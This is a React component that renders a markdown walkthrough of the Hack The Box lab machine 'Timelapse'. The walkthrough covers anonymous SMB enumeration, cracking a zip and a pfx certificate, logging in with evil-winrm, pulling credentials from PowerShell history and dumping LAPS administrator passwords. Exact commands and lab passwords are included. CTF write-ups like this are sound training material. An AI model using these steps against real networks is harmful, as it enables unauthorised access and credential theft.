import ReactMarkdown from 'react-markdown'
import remarkGfm from 'remark-gfm'
import {Prism as SyntaxHighlighter} from 'react-syntax-highlighter'
import {dracula} from 'react-syntax-highlighter/dist/esm/styles/prism'
import './htb.css'

const markdown = `
### Machine IP: 10.10.11.152

![](/writeups/Timelapse/title.png)

Author: Arman
* https://github.com/ArmanHZ
* https://app.hackthebox.com/profile/318304

---

### Initial Enumeration
We start with an \`nmap\` scan.

\`\`\`bash
mkdir nmap
nmap -sC -sV -v -Pn -oN nmap/initial_scan 10.10.11.152
\`\`\`

We use the \`-Pn\` flag since we get the following message:

\`\`\`text
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
\`\`\`

\`\`\`text
# Nmap 7.92 scan initiated Mon Apr 11 22:48:45 2022 as: nmap -sC -sV -v -Pn -oN nmap/initial_scan 10.10.11.152
Nmap scan report for timelapse.htb (10.10.11.152)
Host is up (0.051s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-12 11:48:55Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m57s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-04-12T11:49:02
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 11 22:49:40 2022 -- 1 IP address (1 host up) scanned in 55.25 seconds
\`\`\`

We see a lot of services and ports open. Among these we see the \`RPC\` service. We can try to connect to the server using \`smbclient\` and \`rpcclient\`.
Since there are no web services, let us proceed with checking out the \`RPC\` service.

---

### RPC Enumeration
Let us try to view the shares on the server using the following command:

\`\`\`bash
# No username login. Press enter for empty password.
smbclient -U "" -L 10.10.11.152
\`\`\`

![](/writeups/Timelapse/smb_login.png)

We get some shares! Let us check out the \`Shares\` share, since the other ones are default shares.

We can do this as follows:

\`\`\`bash
smbclient -U "" //10.10.11.152/Shares
\`\`\`

![](/writeups/Timelapse/smb_shares_folder.png)

We get 2 directories which are in the \`Shares\` share. Let us check them out.

![](/writeups/Timelapse/smb_interesting_files.png)

The \`HelpDesk\` share has some files related to \`LAPS\`, however, after downloading and looking at these files, we get nothing of importance.

![](/writeups/Timelapse/smb_zip_file.png)

In the \`Dev\` directory, we get an interesting zip file. Let us download it using \`get winrm_backup.zip\` and check it out on our machine.

---

### Examining the Zip File
When we try to unzip the file, we get the following:

![](/writeups/Timelapse/zip_password.png)

Since we do not have any clue what the password could be, we could try to brute force it.

To brute force the zip file, we will use \`John The Ripper\` and \`SecLists\`. We will use \`rockyout.txt\` from \`SecLists\` word lists.

Before we brute force the zip file, \`john\` requires the hash of the file. We can create this using \`zip2john\` using the following command:

\`\`\`bash
zip2john winrm_backup.zip > hash.txt
\`\`\`

Then we can use the following command to start brute force password cracking:

\`\`\`bash
john --wordlist=~/Hacking/SecLists/Passwords/Leaked-Databases/rockyou.txt hash.txt
\`\`\`

![](/writeups/Timelapse/zip_crack.png)

After a while, we find the password!

The password for the zip file is \`supremelegacy\`. Now we can unzip the file.

After we unzip the file, we get another file. This file is \`legacyy_dev_auth.pfx\`. After looking up what a \`pfx\` file is, we find out that it is a file which contains the SSL certificate (public keys) and the corresponding private keys.

After googleing how to read \`pfx\` files, we find the following command:

\`\`\`bash
# For extracting the Certificate
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out drlive.crt
# For extracting the Private Key
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out drlive.key
\`\`\`

After running the commands, we get the following:

![](/writeups/Timelapse/pfx_password_needed.png)

We try the previously obtained password \`supremelegacy\`, however, it does not work. We have to brute force this as well.

After searching for a tool capable of brute forcing the \`pfx\` file, we find the following repository: https://github.com/crackpkcs12/crackpkcs12

We setup and use the tool as explained in the GitHub repository:

![](/writeups/Timelapse/cert_key_brute.png)

And we get the password! The password is \`thuglegacy\`.

Now we can use the previous \`openssl\` commands with the new password and extract both the cert and the private key.

![](/writeups/Timelapse/pfx_key_example.png)

The private key looks as shown above. However, before we can use this, we must delete the lines above the \`---BEGIN\` part. We have to do this for **both** cert and private key files.

After our private key and cert are ready, we can try to login using \`WinRM\`

---

### Initial Foothold
We will use \`evil-winrm\` to login to the server using our obtained private key and cert using the following command:

\`\`\`bash
evil-winrm -S -k drlive.key.edited -c drlive.crt.edited -i 10.10.11.152
\`\`\`

![](/writeups/Timelapse/winrm_login.png)

We will be prompt to enter a password regardless of us using the keys. Luckily the password \`thuglegacy\` works! This prompt will also occur often when enumerating, so save the password to your clipboard.

Using the \`whoami\` command, we can see that we are the \`legacyy\` user and the machine is named \`timelapse\`.

At this point we can use the following command to see if our user got the user flag or not:

\`\`\`powershell
# from the C:\\Users\\legacyy directory
gci -force -recurse -filter "*.txt" 2>$null
\`\`\`

![](/writeups/Timelapse/text_search_lucky.png)

We get the \`user.txt\` file and also another interesting file \`ConsoleHost_history.txt\`.

Let us see its content as well.

\`\`\`powershell
type C:\\Users\\legacyy\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
\`\`\`

![](/writeups/Timelapse/console_history_2.png)

It appears as though we have another user and password!

Let us check the users on the system to confirm this find.

![](/writeups/Timelapse/winrm_users.png)

The \`svc_deploy\` user exists on the system. Before moving to that user, let us do some enumeration with our current user.

![](/writeups/Timelapse/legacyy_privs.png)

Unfortunately, we cannot access the other users or any other interesting files. Furthermore, we do not have any privileges and we are not part of an important group.

The next step would be to login with the \`svc_deploy\` user.

---

### Privilege Escalation
We will use \`evil-winrm\` again, but this time with the newly acquired credentials \`svc_deploy\` and \`E3R$Q62^12p7PLlC%KWaxuaV\`.

\`\`\`bash
evil-winrm -S -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i 10.10.11.152
\`\`\`

![](/writeups/Timelapse/svc_deploy_login.png)

We logged in as the \`svc_deploy\` user. However, this user does not have any interesting files.

Let us check its privileges and groups.

![](/writeups/Timelapse/svc_deploy_privs.png)

We do not have any outstanding privileges, however, we are a part of the \`LAPS_Readers\` group. We can potentially dump \`LAPS\` credentials.

---

### Root
After googleing about \`LAPS\`, we can use the following commands as the \`svc_deploy\` user to get the \`root\` user's credentials:

\`\`\`powershell
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
\`\`\`

![](/writeups/Timelapse/laps_dump.png)

We get the domain controller \`dc01.timelapse.htb\` with the password \`1Bvu.h48R[WWxn28[5J6lZ;)\`.

Let us login as the \`Administrator\`:

\`\`\`powershell
evil-winrm -S -r dc01.timelapse.htb -u Administrator -p '1Bvu.h48R[WWxn28[5J6lZ;)' -i 10.10.11.152
\`\`\`

We login successfully, however, the flag is not in the admin's \`Desktop\`, directory.

After looking around a bit, we find it in the \`TRX\` user.

![](/writeups/Timelapse/root.png)

And we have rooted this box!
`;

export default function Timelapse() {
  return (
    <div className='writeup-div'>
      <ReactMarkdown
      children={markdown}
      remarkPlugins={[remarkGfm]}
      components={{
        code({node, inline, className, children, ...props}) {
          const match = /language-(\w+)/.exec(className || '')
          return !inline && match ? (
            // @ts-ignore
            <SyntaxHighlighter children={String(children).replace(/\n$/, '')} style={dracula} language={match[1]} PreTag="div" {...props} />
          ) : (
            <code className={className} {...props}>
              {children}
            </code>
          )
        }
      }}
      />
    </div>
  )
}